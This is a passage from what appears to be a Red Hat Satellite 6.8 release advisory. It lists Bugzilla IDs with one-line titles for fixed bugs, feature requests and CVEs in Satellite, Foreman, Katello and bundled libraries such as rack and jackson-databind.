\u0027ECDHE-RSA-AES256-GCM-SHA384\u0027)\n1571907 - Passenger threads throwing tracebacks on API jobs after spawning\n1576859 - [RFE] Implement automatic assigning subnets through data provided by facter\n1584184 - [RFE] The locked template is getting overridden by default\n1601101 - [RFE] Add autofill functionality to the Job invocation Search query box, copy from Hosts search box\n1607706 - [RFE] Add support for --vlanid in Satellite Kickstart Default provisioning template\n1608001 - Rearrange search/filter options on Red Hat Repositories page. \n1613391 - race condition on removing multiple organizations simultaneously\n1619274 - [RFE] Red Hat Satellite should now be able to discover and provision bare metal machines via UEFI HTTP boot\n1619422 - User Agent for Downstream RSS feed still says Foreman and Foreman Version\n1620214 - Page should auto-refresh after subscriptions have been modified on the Satellite webui\n1624049 - Changing the organization in the Satellite WebUI does not change the sync plan page information from the previous organization\n1625258 - Having empty \"Allocation (GB)\" when creating a new Host, nil:NilClass returned on creating the Host\n1627066 - Unable to revert to the original version of the provisioning template\n1630433 - [RFE] Include Ansible Satellite modules with Ansible Core modules\n1630536 - yum repos password stored as cleartext\n1632577 - Audit log show \u0027missing\u0027 for adding/removing repository to a CV\n1640615 - CVE-2018-3258 mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018)\n1645062 - host_collection controller responds with 200 instead of 201 to a POST request\n1645749 - repositories controller responds with 200 instead of 201 to a POST request\n1647216 - Lack of edit_smart_proxies permission causes error when setting host to Build\n1647364 - [RFE] Extend the audits by the http request id\n1647781 - Audits contain no data (Added foo to Missing(ID: x))\n1651297 - Very slow query when using facts on user roles as filters\n1653217 - [RFE] More evocative name for Play Ansible Roles option?\n1654347 - Satellite may create duplicate CreateRssNotifications tasks after restarting foreman tasks\n1654375 - [RFE] Mention specifically uder the admin chexbox for AD LDAP user if its created with admin role,\n1659418 - katello-tracer-upload failing with error \"ImportError: No module named katello\"\n1665277 - subscription manager register activation key with special character failed\n1665893 - candlepin refuses to start or hangs periodically when having too many messages in ActiveMQ journal\n1666693 - Command \"hammer subscription list\" is not correctly showing the comment \"Guests of \" in the \"Type\" field in the output. \n1677907 - Ansible API endpoints return 404\n1680157 - [RFE] Puppet \u0027package\u0027 provider type does not support selecting modularity streams\n1680458 - Locked Report Templates are getting removed. \n1680567 - Reporting Engine API to list report template per organization/location returns 404 error\n1681619 - [RFE] Disable the option to enter a MAC address after selecting a compute resource while creating new hosts through Satellite\n1685949 - [RFE] Support passing of attribute name instead of Id\u0027s in RHV workflow\n1687116 - kernel version checks should not use /lib/modules to determine running version\n1688886 - subscription-manager not attaching the right quantity per the cpu core\n1691416 - Delays when many clients upload tracer data simultaneously\n1697476 - [RFE] To be able to see the name of the provisioning template being used to build a host from the host itself\n1702434 - foreman-bootloaders-redhat-tftpboot expected file permissions in package don\u0027t match runtime permissions\n1705097 - An empty report file doesn\u0027t show any headers\n1709557 - [RFE] warn the user if they have done a select all and it includes the restart|reboot service\n1709842 - Tracer shows the machines needs rebooting even after reboot if kernel-debug is installed\n1710511 - Filter by os_minor includes unexpected values on the Satellite web UI. \n1715999 - Use Infoblox API for DNS conflict check and not system resolver\n1716423 - Nonexistent quota can be set\n1717403 - Broken breadcrumbs link to compute resource VM list on VM detail page\n1718012 - [RFE] Add a hard limit of 100 items to restrict any fact child-hash/array\n1718954 - [RFE] When the contentAccessMode is set to org_environment for an owner, we should disable auto-attach globally\n1719509 - [RFE] \"hammer host list\" including erratas information\n1719516 - [RFE] \"hammer host-collection hosts\" including erratas information\n1720725 - [RFE] Ability to override DHCP options and wait_after_restart option for race condition\n1721419 - SSH key cannot be added when FIPS enabled\n1722954 - Slow performance when running \"hammer host list\" with a high number of Content Hosts (15k+ for example)\n1723313 - foreman_tasks:cleanup description contain inconsistent information\n1724494 - [Capsule][smart_proxy_dynflow_core] \"PID file /var/run/foreman-proxy/smart_proxy_dynflow_core.pid not readable (yet?) after start\"\n1724497 - CVE-2019-12781 Django: Incorrect HTTP detection with reverse-proxy connecting via HTTPS\n1726768 - [RFE] Red Hat Satellite 6 GUI, Tasks should show Full name\n1729968 - Editing disk size of a Compute Profile for a VMware Compute Resource makes the whole Storage section disappear\n1730083 - [RFE] Add Jobs button to host detail page\n1731155 - Cloud init template missing snippet compared to Kickstart default user data\n1731229 - podman search against Red Hat Satellite 6 fails. \n1731235 - [RFE] Create Report Template to list inactive hosts\n1733241 - [RFE] hammer does not inherit parent location information\n1733650 - Satellite receives RPM1004 pulp error and 403 Forbidden http error retrieving packages from CDN\n1736809 - undefined method `split\u0027 for nil:NilClass when viewing the host info with hammer\n1737135 - Content Hosts loses subscriptions after Vmotion and auto attach is unable to assigned the subscriptions if any other subscription is already attached to the host. \n1737564 - [RFE] Support custom images on Azure\n1738548 - Parameter --openscap-proxy-id is missing in hammer host create command. \n1740943 - Increasing Ansible verbosity level does not increase the verbosity of output\n1743056 - While creating a host for a particular location, all the domains are in the pull down list, even if only one domain is selected for that location. \n1743776 - Error while deleting the content view version. \n1745516 - Multiple duplicate index entries are present in candlepin database\n1746936 - satellite6 is not using remote execution by default even after setting remote execution by default from satellite web-UI. \n1749692 - Default Rhel8 scap content does not get populated on the Satellite\n1749916 - [RFE] Satellite should support certificates with \u003e 2048 Key size\n1751981 - Parent object properties are not propagated to Child objects in Location and Host Group\n1752880 - katello-host-tools-tracer stats paths abusively, leading to a hang or slowness of yum command\n1753551 - Traces output from Satellite GUI has mismatches with client tracer output\n1756991 - 2 inputs with same name -\u003e uninitialized constant #\u003cClass:0x000000000b894c38\u003e::NonUniqueInputsError\n1757317 - [RFE] Dynflow workers extraction\n1757394 - [BUG] Non-admin users always get \"Missing one of the required permissions\" message while accessing their own table_preferences via Satellite 6 API\n1759160 - Rake task for cleaning up DHCP records on proxy\n1761872 - Disabled buttons are still working\n1763178 - [RFE] Unnecessary call to userhelp and therefore log entries\n1763816 - [RFE] Report which users access the API\n1766613 - Fact search bar broken and resets to only searching hostname\n1766906 - Associating more than 10 Ansible roles to a Host only sets based on the per-page setting\n1767497 - Compute Resource filter does not correctly allow Refresh Cache\n1767635 - [RFE] Enable Organization and Location to be entered not just selected\n1770366 - [RFE] Improve upgrade efficiency by moving RPM post-installation scripts to the installer. \n1770544 - Puppet run job notification do not populate \"%{puppet_options}\"\u0027 value\n1770777 - Changing concurrency level while executing Ansible jobs fail with NoMethodError: undefined method `[]\u0027 for nil:NilClass\n1771367 - undefined method `request_uri\u0027 when Openidc Provider Token Endpoint is none\n1771428 - Openscap documentation link on Satellite 6 webui is broke\n1771484 - Client side documentation links are not branded\n1771693 - \u0027Deployed on\u0027 parameter is not listed in API output\n1772381 - Incorrect example to use multiple attributes as a matcher key in the tooltip for Order\n1772517 - login with the user name as same as existing user group gives 500 ISE and wont allow user to login again\n1772544 - Use APIv4 is not the default when creating a new compute resource in ovirt\n1773298 - GET /katello/api/srpms/compare always fails with error: Missing template katello/api/v2/common/compare\n1774710 - UI: When selecting the server type in ldap authentication, \"attribute mappings\" fields could be populated automatically\n1778396 - exporting/importing report template process is causing a different report during the visualization (blank lines)\n1778503 - Prepended text on OS name creation\n1778681 - Some pages are missing title in html head\n1779638 - Unable to filter/search http-proxies using Organization/Location for Satellite UI. \n1781671 - While using concurrency_level in remote execution, job progress in WebUI is not being updated properly\n1782352 - [RHEL 8.1 client] All packages are not getting updated after click on \"Update All Packages\"\n1782426 - Viewing errata from a repository returns incorrect unfiltered results\n1783568 - [RFE] - Bulk Tracer Remediation\n1783882 - Ldap refresh failed with \"Validation failed: Adding would cause a cycle!\"\n1784012 - Default kickstart places log to /mnt/sysimage/root/install.post.log\n1784341 - disable CertificateRevocationListTask job in candlepin.conf by default\n1785117 - [RFE] Add functionality in foreman logging to hash-out or mark as [FILTERED] the password in /var/log/foreman-maintain/foreman-maintain.log and /var/log/foreman-installer/satellite.log file\n1785231 - Ansible Variable override to false does not gets reflected on client machine on Red Hat Satellite 6. \n1785624 - [UI] Importing templates with associate \u0027never\u0027 is not resulting as expected\n1785683 - Does not load datacenter when multiple compute resources are created for same VCenter\n1785902 - Ansible RunHostJob tasks failed with \"Failed to initialize: NoMethodError - undefined method `[]\u0027 for nil:NilClass\"\n1785940 - [RFE] Reporting template should allow host filtering based on applicable errata issue date\n1787329 - change filename in initrd live CPIO archive to fdi.iso\n1788261 - CVE-2018-11751 puppet-agent: Puppet Agent does not properly verify SSL connection when downloading a CRL\n1788958 - [RFE] add \"elapsed time\" column to export and hammer, make it filterable in WebUI\n1789006 - Smart proxy dynflow core listens on 0.0.0.0\n1789100 - CVE-2019-16782 rubygem-rack: hijack sessions by using timing attacks targeting the session id\n1789434 - Template editor not always allows refreshing of the preview pane\n1789522 - On unhealthy Satellite, dynflow_envelopes table might grow indefinitely\n1789686 - Non-admin user with enough permissions can\u0027t generate report of applicable errata\n1789815 - The \"start\" parameter should be mentioned inside \"--compute-attributes:\" in hammer_cli for Satellite 6\n1789911 - \"foreman-rake katello:publish_unpublished_repositories\" is referring to column which no longer exists in katello_repositories table. \n1789924 - [RFE] As user I want to see a \"disabled\" status for Simple Content Access (Golden Ticketed) Orgs\n1791654 - drop config_templates api endpoints and parameters\n1791656 - drop deprecated host status endpoint\n1791658 - drop reports api endpoint\n1791659 - Remove `use_puppet_default` api params\n1791663 - remove deprecated permissions api parameters\n1791665 - drop deprecated compute resource uuid parameter\n1792131 - [UI] Could not specify organization/location for users that come from keycloak\n1792135 - Not able to login again if session expired from keycloak\n1792174 - [RFE] Subscription report template\n1792304 - When generating custom report, leave output format field empty\n1792378 - [RFE] Long role names are cut off in the roles UI\n1793951 - [RFE] Display request UUID on audits page\n1794015 - When using boot disk based provisioning, sometimes foreman tries to recreate folder foreman_isos in the datastore even when the folder already exists\n1794346 - Change the label for the flashing eye icon during user impersonation\n1794641 - Sync status page\u0027s content are not being displayed properly. \n1795809 - HTML tags visible on paused task page\n1796155 - [RFE] host_collections not available in reporting engine unless safe mode disabled\n1796205 - iso upload: correctly check if upload directory exists\n1796225 - CVE-2020-7238 netty: HTTP Request Smuggling due to Transfer-Encoding whitespace mishandling\n1796259 - loading subscriptions page is very slow\n1796697 - Unable to list/enable EUS repositories on the RHEL clients registered in the satellite server with org_environment contentAccessMode\n1798489 - [RHSSO] - If Access Token Lifespan is set to 5 mins then the user is getting sign out instead after idle SSO timeout\n1798668 - Configure default MongoDB WiredTiger cache to be 20% of RAM in the Satellite server\n1799480 - CLI - hammer repository info shows blank sync status if the repository sync is in warning/error state. \n1800503 - In Hammer, it is not possible to set default keyboard layout for a RHEV host\n1801264 - CVE-2020-5217 rubygem-secure_headers: directive injection when using dynamic overrides with user input\n1801286 - CVE-2020-5216 rubygem-secure_headers: limited header injection when using dynamic overrides with user input\n1802529 - Repository sync in tasks page shows percentage in 17 decimal points\n1802631 - Importing Ansible variables yields NoMethodError: undefined method `map\u0027 for nil:NilClass (initialize_variables) [variables_importer.rb]\n1803846 - Red Hat Insights Risk Summary shows systems at risk while there are none\n1804496 - While performing bulk actions, unable to select all tasks under Monitor --\u003e Tasks page. \n1804651 - Missing information about \"Create Capsule\" via webUI\n1805501 - CVE-2020-10693 hibernate-validator: Improper input validation in the interpolation of constraint error messages\n1805727 - Default Custom Repository download policy setting refers to old name (Default Repository download policy) in satellite 6.7\n1806713 - hypervisor checkin fails with cp_consumer_hypervisor_ukey error\n1806842 - Disabling dynflow_enable_console from setting should hide \"Dynflow console\" in Tasks\n1806897 - Red Hat Inventory Uploads fail with NoMethodError: undefined method `mtu\u0027\n1807042 - [RFE] Support additional disks for VM on Azure Compute Resource\n1807321 - A non-admin users with view recurring_logics permissions are unable to list recurring logics. \n1807829 - Generated inventory file doesn\u0027t exist\n1807946 - Multiple duplicate index entries are present in foreman database\n1808843 - Satellite lists unrelated RHV storage domains using v4 API\n1810250 - Unable to delete repository - Content with ID could not be found\n1810549 - dropping packets to qdrouterd triggers a memory leak in qpid-proton 0.28.0-2 libraries used by goferd\n1810774 - Applying errata via Host Collection the errata are trying to be applied to all hosts associated with the host collection\n1811390 - Links to an errata list of a repository lack repositoryId in URI and points to generic \"errata\" page instead\n1812031 - Improve regenerate applicability tasks performance by querying NEVRA only data from repo_content_units\n1812858 - Satellite Inventory Plugin does not appear to make reports which match yupana\u0027s API specification\n1812904 - \u0027Hypervisors\u0027 task fails with \u0027undefined method `[]\u0027 for nil:NilClass\u0027 error\n1813005 - Prevent --tuning option to be applied in Capsule servers\n1813313 - [Tracker] Test HTTP UEFI on IPv6 (QA only tracker)\n1814095 - Applicable errata not showing up for module stream errata\n1815104 - Locked provisioning template should not be allowed to add audit comment\n1815135 - hammer does not support description for custom repositories\n1815146 - Backslash escapes when downloading a JSON-formatted report multiple times\n1815608 - Content Hosts has Access to Content View from Different Organization\n1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking\n1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config\n1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap\n1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core\n1816699 - Satellite Receptor Installer role can miss accounts under certain conditions\n1816720 - CVE-2020-7942 puppet: Arbitrary catalog retrieval\n1816853 - Report generated by Red Hat Inventory Uploads is empty. \n1817215 - Admin must be able to provide all the client ids involved inside Satellite settings. \n1817224 - Loading one org\u0027s content view when switching to a different org\n1817481 - Plugin does not set page \u003ctitle\u003e\n1817728 - Default task polling is too frequent at scale\n1817874 - After data upload from satellite UI it is not visible on cloud.redhat.com. \n1818062 - Deprecated message about katello agent being shown on content host registration page\n1818816 - Web console should open in a new tab/window\n1819145 - [RFE] Incorporate apipie-dsl to document template macros, provided as one-time generated HTML document\n1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider\n1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane\n1820193 - Deleted Global Http Proxy is still being used during repository sync. \n1820245 - reports in JSON format can\u0027t handle unicode characters\n1821182 - [Repository] - Packages are not getting synced with rpm-with-sha-512\n1821335 - Inventory plugin captures information for systems with any entitlement\n1821457 - [RFE] Capsules shouldn\u0027t update hosts\u0027 \"Registered through\" facts on the Satellite server in a load-balanced configuration. \n1821629 - Eager zero seems to do nothing\n1821651 - Manifest import task progress remains at 0. \n1821752 - New version of the plugin is available: 1.0.5\n1822039 - Get HTTP error when deploying the virt-who configure plugin\n1822560 - Unable to sync large openshift docker repos\n1823905 - Update distributor version to sat-6.7\n1823991 - [RFE] Add a more performant way to sort reports\n1824183 - Virtual host get counted as physical hosts on cloud.redhat.com\n1824931 - After upgrading to Satellite 6.7 the Tasks page in WebUI goes \"Blank\"\n1825760 - schedule inventory plugin sync failed due to \u0027organization_id\u0027 typecasting issue. \n1825930 - [Regression] RedHat Insights client proxying stopped working due to missing proxy\n1825978 - Manifest refresh failed with \u0027Katello::Errors::CandlepinError Invalid credentials.\u0027 error\n1826298 - even when I cancel ReX job, remediation still shows it as running\n1826340 - [RFE] Ability to provision a VM using Red Hat Gold BYOS images\n1826515 - [RFE] Consume Candlepin events via STOMP\n1826625 - Improve performance of externalNodes\n1826678 - New version of the plugin is available: 2.0.6\n1826734 - Tasks uses wrong controller name for bookmarks\n1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop\n1827389 - Manifest import and delete calls Actions::Pulp::Repository::Refresh for non-Library repositories\n1827583 - Installing dhcp_isc and dhcp_remote_isc fails with \"You cannot specify the same gem twice with different version requirements.....You specified: rsec (\u003c 1) and rsec (\u003e= 0)\"\n1828257 - Receptor init file missing [Install] section, receptor service won\u0027t run after restart\n1828486 - CVE-2020-7943 puppet: puppet server and puppetDB may leak sensitive information via metrics API\n1828549 - Manifest Certificate Exposed by Unprivileged User\n1828682 - Create compute resource shows console error \u0027Cannot read property \u0027aDataSort\u0027 of undefined\u0027\n1828789 - [RFE] Satellite installer should support installing the Satellite Inventory Provider by default\n1828868 - Add keep alive option in Receptor node\n1829487 - Ansible verbosity level does not work\n1829766 - undefined method `tr\u0027 for nil:NilClass when trying to get a new DHCP lease from infoblox\n1830253 - Default job templates are not locked\n1830403 - Capsule sync fails when promoting a content view to more than one lifecyle env at the same time\n1830834 - Unable to update default value of a smart class parameter (Sql query error). \n1830860 - Refactor loading regions based on subscription dynamically\n1830882 - Red Hat Satellite brand icon is missing\n1830884 - bootstrap.py script tries to yum install puppet package that is not in rhel-7-server-satellite-tools-6.7-rpms repo\n1831528 - CVE-2020-5267 rubygem-actionview: views that use the `j` or `escape_javascript` methods are susceptible to XSS attacks\n1833031 - Improve RH account ID fetching in cloud connector playbook\n1833035 - Add remediation bulk ack message (i.e. all hosts for a given run has finished)\n1833039 - Introduce error code to playbook_run_finished response type\n1833311 - \"Failed to save: Failed to save when overriding parameters for ansible, cause: Default value is invalid\" while creating scap policy with ansible deployment option. \n1834302 - --enable-foreman-plugin-rh-cloud fails: Execution of \u0027/bin/yum -d 0 -e 0 -y install tfm-rubygem-foreman_rh_cloud\u0027 returned 1: Error: Nothing to do\n1834377 - Disable mongo FTDC\n1834866 - Missing macro for \"registered_at\" host subscription facet\n1834898 - Login Page background got centralized and cropped\n1835189 - Missing macro for \"host_redhat_subscriptions\" in host subscription facet\n1835241 - Some applicability of the consumers are not recalculated after syncing a repository\n1835882 - While executing \"Configure Cloud Connector\" playbook on Satellite 6.7 server it does not honour HTTP Proxy setting\n1836155 - Support follow on rails, travis and i18n work for AzureRm plugin\n1836771 - In satellite installation summary report, satellite should be mentioned instead of foreman. \n1836774 - Some foreman services failed to start (pulp_streamer)\n1836845 - \"Generate at\" in report template should be current date\n1837951 - \"invalid Unicode Property \\p: /\\b\\perform various actions through those proxies\\b(?!-)/\" warning messages appears in dynflow-sidekiq@worker-hosts-queue\n1838160 - \u0027Registered hosts\u0027 report does not list kernel release for rhsm clients\n1838191 - Arrow position is on left rather in the middle under \"Start Time\"\n1838281 - CVE-2020-8161 rubygem-rack: directory traversal in Rack::Directory\n1838917 - Repositories are not showing their available Release versions due to a low default db pool size\n1838963 - Hypervisors from Satellite, never makes their way to HBI\n1838965 - Product name link is not working on the activation keys \"Repository Sets\" tab. \n1839025 - Configure Cloud Connector relies on information which is no longer provided by the API\n1839649 - satellite-installer --reset returns a traceback\n1839726 - Bring tfm-rubygem-foreman_leapp to downstream builds\n1839779 - undefined local variable or method `implicit_order_column\u0027 for #\u003cActiveRecord::Associations::CollectionProxy\u003e on GET request to /discovery_rules endpoint\n1839966 - New version of the plugin is available: 2.0.7\n1840166 - ERF42-4995 [Foreman::Exception]: Invalid authenticity token message displayed with traceback, If re-login the machine after session timed-out . \n1840191 - Validate parameters passed by receptor to the receptor-satellite plugin\n1840218 - ArgumentError: wrong number of arguments\n1840525 - Content host list doesn\u0027t update after the successful deletion of content host. \n1840635 - Proxy has failed to load one or more features (Realm)\n1840723 - Selected scenario is DISABLED, can not continue\n1840745 - Satellite installation failed with puppet error \" No Puppet module parser is installed\"\n1841098 - Failed to resolve package dependency while doing satellite upgrade. \n1841143 - Known hosts key removal may fail hard, preventing host from being provisioned\n1841573 - Clicking breadcrumb \"Auth Source Ldaps\" on Create LDAP Auth Source results in \"The page you were looking for doesn\u0027t exist.\"\n1841818 - icons missing on /pub download page\n1842900 - ERROR! the role \u0027satellite-receptor\u0027 was not found in ... \n1842943 - ~foreman-proxy/.ssh is a symlink to /usr/com/foreman-proxy/ssh/\n1843406 - In 6.8, Receptor installation playbook\u0027s inputs are visible again\n1843561 - Report templates duplicated\n1843846 - Host - Registered Content Hosts report: \"Safemode doesn\u0027t allow to access \u0027report_hraders\u0027 on #\u003cSafemode::ScopeObject\u003e\"\n1843867 - Satellite-installer failed with argument error while upgrading the satellite from 6.7 to 6.8\n1843926 - satellite-change-hostname fails when running nsupdate\n1844142 - [RFE] Drop a subsription-manager fact with the satellite version\n1845112 - Installer deploys outdated version of pxegrub2 mac template to TFTP\n1845486 - [RFE] Able to select \u0027HTTP Proxy\u0027 during Compute Resource create for \u0027GCE\u0027 as similar to EC2\n1845860 - hammer org add-provisioning-template command returns Error: undefined method `[]\u0027 for nil:NilClass\n1845978 - CVE-2020-7663 rubygem-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser\n1846254 - need to restart services after enabling leapp plugin\n1846313 - Add index on locks for resource type and task id\n1846317 - undefined method `klass\u0027 for nil:NilClass\n1846421 - build pxe default do not work when more than 1 provider\n1846593 - Satellite-installer failed with error \"Could not find a suitable provider for foreman_smartproxy\" while doing upgrade from 6.7 to 6.8\n1847019 - Empty applicability for non-modular repos\n1847063 - Slow manifest import and/or refresh\n1847407 - load_pools macro not in list of macros\n1847645 - Allow override of Katello\u0027s DISTRIBUTOR_VERSION\n1847784 - Error updating system data on the server, see /var/log/rhsm/rhsm.log for more details. \n1847840 - Libvirt note link leads to 404\n1847871 - Combined Profile Update: ArgumentError: invalid argument: nil. \n1848291 - Download kernel/initram for kexec asynchronously\n1848535 - Unable to create a pure IPv6 host\n1848538 - Failed to resolve the packages due to tfm-runtime package dependency in fm-upgrade(6.7 to 6.8)\n1848902 - ERF42-0258 [Foreman::Exception]: \u003cuuid\u003e is not valid, enter id or name\n1848958 - CVE-2020-14195 jackson-databind: serialization in org.jsecurity.realm.jndi.JndiRealmFactory\n1848962 - CVE-2020-14062 jackson-databind: serialization in com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool\n1848966 - CVE-2020-14061 jackson-databind: serialization in weblogic/oracle-aqjms\n1848973 - capsule-certs-generate suggests running foreman-installer --scenario foreman-proxy-content instead of satellite-installer --scenario capsule\n1849141 - CVE-2020-8184 rubygem-rack: percent-encoded cookies can be used to overwrite existing prefixed cookie names\n1849656 - ERROR! You cannot use loops on \u0027import_tasks\u0027 statements. You should use \u0027include_tasks\u0027 instead. \n1849680 - Task progress decimal precision discrepancy between UI, CLI, and API\n1849869 - Unable to recycle the dynflow executor\n1850355 - Auth Source Role Filters are not working in Satellite 6.8\n1850536 - Can\u0027t add RHEV with APIv3 through Hammer\n1850914 - Checksum type \"sha256\" is not available for all units in the repository. Make sure those units have been downloaded\n1850934 - Satellite-installer failed with error \"Could not evaluate: Proxy xyz..com cannot be retrieved: unknown error (response 502)\"\n1851017 - Position of text cursor in ace-editor wrong and hence unable to edit templates\n1851030 - [RFE] Upgrade Ansible used from RHEL to be 2.9\n1851167 - Autoattach -\u003e \"undefined\" subscription added\n1851176 - Subscriptions do not provide any repository sets\n1851952 - \"candlepin_events FAIL Not running\" and wont restart\n1852371 - Allow http proxy ports by default\n1852723 - Broken link for documentation on installation media page\n1852733 - Inventory upload documentation redirects to default location\n1852735 - New version of the plugin is available: 2.0.8\n1853076 - large capsule syncs cause slow processing of dynflow tasks/steps\n1853200 - foreman-rake-db:migrate Fails on \"No indexes found on foreman_tasks_locks with the options provided\"\n1853280 - Content view filter is excluding modules and Packages when published after upgrading the Satellite from 6.6 to 6.7\n1853463 - Plugin does not upload inventory - Permission denied /var/lib/foreman/red_hat_inventory/uploads/uploader.sh\n1853504 - [Regression] Hammer export-legacy Fails with Composite Content Views\n1853572 - Broken documentation link for \u0027RHV\u0027 in Compute Resource\n1854138 - System purpose status should show as \u0027disabled\u0027 when Satellite is in Simple Content Access mode. \n1854397 - Compliance reports are not being uploaded to satellite. \n1854530 - PG::NotNullViolation when syncing hosts from cloud\n1855008 - Host parameters are set after the host is created. \n1855254 - Links to documentation broken in HTTP Proxies setup\n1855348 - katello_applicability accidentally set to true at install\n1855710 - \u0027Ensure RPM repository is configured and enabled\u0027 task says \u0027FIXME\u0027\n1856370 - Clicking on any other tab other than overview while on capsule synchronizing page, redirects to overview page. \n1856379 - Add missing VM creation tests\n1856401 - [RFE] Add module to create HTTP Proxy\n1856831 - New version of the plugin is available: 2.0.9\n1856837 - undefined method \u0027#httpboot\u0027 for NilClass::Jail (NilClass) when creating an IPv6 only host\n1857124 - Attempting to attach a subscription to an unregistered host results in ISE 500\n1857146 - Unable to build a host bootdisk image due to missing dosfstools package - Failed to format the ESP image via mkfs.msdos\n1857184 - selinux is preventing to build a bootdisk iso - Failed to format the ESP image via mkfs.msdos\n1857377 - Capsule Upgrade Playbook fails with \"Failed to initialize: NoMethodError - undefined method `default_capsule\u0027 for Katello:Module\"\n1857506 - Capsule Upgrade Fail: satellite-installer --scenario capsule --upgrade throws NameError\n1857572 - tailoring-file and scap-content command of hammer downloads file with wrong filename. \n1857726 - Warnings are shown during the satellite package installation on RHEL 7.9\n1858237 - Upgraded Satellite has duplicated katello_pools indexes\n1858284 - CVE-2020-14334 foreman: unauthorized cache read on RPM-based installations through local user\n1858819 - katello-certs-check output print foreman-installer--scenario katello instead satellite-installer --scenario satellite\n1858855 - Creating compute resources on IPV6 network does not fail gracefully\n1859158 - Unknown HTTPBoot EFI hosts are not directed to the grubx64.efi with a default grub conf\n1859194 - load_hosts macro duplicated in a list of macros\n1859276 - Need to update the deprecation warning message on Statistics and Trends page. \n1859705 - Tomcat is not running on fresh Capsule installation\n1859929 - User can perform other manifest actions while the first one starts\n1860351 - \u0027Host - compare content hosts packages\u0027 report fails with error \u0027undefined method \u0027#first\u0027 for NilClass\u0027\n1860407 - remote job-status table should not be re-loaded every second even if a job is running or completed\n1860422 - Host with remediations can\u0027t be removed\n1860430 - \u0027Host - compare content hosts packages\u0027 report: Safemode doesn\u0027t allow to access \u0027version\u0027... \n1860444 - After the system reboot, capsule setup(upgraded or newly installed 6.8 capsule) fails to start the tomcat service\n1860519 - Browsing capsule /pub directory with https fails with forbidden don\u0027t have permission to access /pub/ error. \n1860585 - Content Host Registration page showing version 6.7 for repos instead 6.8\n1860587 - Documentation link in Administer -\u003e About pointing to 6.6 document. \n1860835 - Installed Packages not displayed on About page\n1860957 - Unable to select an organization for sync management\n1861367 - Import Template sync never completes\n1861397 - UI dialog for Capsule Upgrade Playbook job doesn\u0027t state whitelist_options is required\n1861422 - Error encountered while handling the response, replying with an error message (\u0027plugin_config\u0027)\n1861656 - smart-proxy-openscap-send command fails to upload reports to satellite. \n1861724 - ipv6: host form in interfaces are showing Error generating IP: Bad Request\n1861766 - Add ability to list traces by host with hammer\n1861807 - Cancel/Abort button should be disabled once REX job is finish\n1861816 - Error only on production builds: The Dynflow world was not initialized yet. If your plugin uses it, make sure to call Rails.application.dynflow.require! in some initializer\n1861831 - satellite-change-hostname cannot change the satellite hostname after failing. \n1861890 - Recommended repos do not match Satellite version\n1861970 - Content -\u003e Product doesn\u0027t work when no organization is selected\n1862135 - updating hosts policy using bulk action fails with sql error\n1862445 - compliance policy creation fails for ansible deployment option on upgraded satellite. \n1862772 - Default repositories are not enabled, after registering a client with an Activation Key, to an org with Simple Content Access Mode in Red Hat Satellite 6\n1865871 - Obfuscated hosts do not have domain reported\n1865872 - Templates doc - examples on onepage.html are not processed\n1865874 - Add inventory status to host\n1865876 - Make recommendations count in hosts index a link\n1865879 - Add automatic scheduler for insights sync\n1865880 - Add an explanation how to enable insights sync\n1865928 - Templates documentation help page has hard-coded Satellite setting value\n1865943 - dynflow-sidekiq results in messages logs getting filled up more frequently\n1866029 - Templates DSL documentation: Parts of description are put in \u003cpre\u003e tag\n1866436 - host search filter does not work in job invocation page\n1866461 - Run action is missing in job templates page\n1866515 - ForemanVirtWhoConfigure::AuthSourceHiddenWithAuthentication is displayed on auth sources page\n1866700 - Hammer CLI is missing \"resolve\" (traces) option for katello-tracer\n1866710 - Wrong API endpoint path referenced for resolving host traces\n1867239 - hammer content-view version incremental-update fails with ISE\n1867287 - Error Row was updated or deleted by another transaction when deleting docker repository\n1867311 - Upgrade fails when checkpoint_segments postgres parameter configured\n1867399 - Receptor-satellite isn\u0027t able to deal with jobs where all the hosts are unknown to satellite\n1867895 - API Create vmware ComputeResource fails with \"Datacenter can\u0027t be blank\"\n1868183 - Unable to change virt-who hypervisor location. \n1868971 - Receptor installation job doesn\u0027t properly escape data it puts into receptor.conf\n1869640 - client-dispatcher: wrong number of arguments (given 0, expected 1..3) (ArgumentError)\u0027 messages come in upgrade and installation. \n1869812 - Tasks fail to complete under load\n1870657 - Make rake console run as a dynflow client to allow access to features provided by dynflow\n1871016 - managercli.py:1364 - Error: Unable to retrieve service levels: HTTP error (404 - Not Found)\n1871434 - theme css \".container\" class rule is too generic\n1871729 - ansible-runner implementation depends on third party repository for ansible-runner package. \n1871815 - Satellite Ansible Collection - Provisioning a host fails with timeout\n1871978 - Bug in provisioning_template Module\n1872014 - Enable web console on host error in \"Oops, we\u0027re sorry but something went wrong ERF42-5962 [Foreman::Exception]: No template mapped to feature Enable web console\"\n1872041 - Host search returns incorrect result\n1873408 - Updating the CDN URL is manifest works fine but creates some tasks which remains in planned state with success result\n1873926 - CVE-2020-14380 Satellite: Local user impersonation by Single sign-on (SSO) user leads to account takeover\n1874143 - Red Hat Inventory Uploads does not use proxy\n1874160 - Changing Content View of a Content Host needs to better inform the user around client needs\n1874168 - Sync Plan fails with \u0027uninitialized constant Actions::Foreman::Exception\u0027\n1874171 - [RFE] Allow Subscription-manager service plugin for zypper (SLES) to set autorefresh in repo file\n1874172 - [6.7] Unable to re-import subscriptions in large environment (60k+ content hosts)\n1874175 - After upgrading to 6.7 and promoting content, Capsule sync is extremely slow\n1874176 - Unable to search by value of certain Hostgroup parameter\n1874422 - Hits Sync uses only old proxy setting\n1874619 - Hostgroup tag is never reported in slice\n1875357 - After upgrade server response check failed for candlepin. \n1875426 - Azure VM provision fails with error `requests.exceptions.HTTPError: 502 Server Error: Proxy Error for url`\n1875660 - Reporting Template macros host_cores is not working as expected\n1875667 - Audit page list incorrect search filter\n1877307 - [Authentication] External auth login using Kerberos SSO is failing for AD and IDM on Satellite 6.8 only\n1877354 - [Sat6/Bug] RHEL8 systems generate false positive warnings about 